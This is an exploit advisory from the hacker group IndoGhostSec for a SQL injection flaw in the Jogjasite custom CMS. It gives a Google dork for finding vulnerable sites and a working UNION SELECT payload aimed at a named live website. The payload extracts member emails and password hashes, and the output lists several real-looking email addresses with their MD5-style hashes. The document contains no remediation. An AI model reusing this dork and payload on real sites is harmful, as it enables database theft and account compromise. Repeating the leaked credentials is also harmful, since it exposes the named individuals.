############################################################# # Exploit Title: Custom CMS Jogjasite - SQL-Injection Vulnerability # Exploit Author: Gh05t666nero # Author Team: IndoGhostSec # Google Dork: intext:"By jogjasite.com" # Software Vendor: jogjasite.com # Software Version: * # Software Link: N/A # Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux # Date: 2021-02-05 ############################################################# [*] Information: ════════════════ Jogjasite is a custom website creation service, namely web design services and web programming services according to your wishes and needs. But, they program the site so unsatisfactory that it leaves some vulnerabilities. ############################################################# [*] Exploit: ════════════ - ############################################################# [*] Demo: ═════════ https://sonjucomputerjogja.com/kategori-12'+AND+0+UNION+SELECT+1,2,3,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(memberarea)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x203a3a20,password,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+--accessories wen_2111@yahoo.com :: 5a06cc059b39d1b3508efe00d044db05 mailinfo@newmedicforum.com :: ca5c40c1e33d5309ab72ff31278a330a info@newmedicforum.com :: fb882e63aef3468637787d2ed310602f email@newmedicforum.com :: ff332ac34eb7fc59519013e9d2b7474f agussribanowo@gmail.com :: 8f4f3b665a576448fc9ce34a34c916af apigflexter@gmail.com :: 346f67beda8b6aaf5bceeeffe5fab5c1 ############################################################# [*] Contact: ════════════ # Instagram: instagram.com/ojan_.py # Telegram : t.me/Gh05t666nero # Twitter: twitter.com/Gh05t666nero1 # Blogger: anonsec.my.id # E-mail : anoncentraI@protonmail.com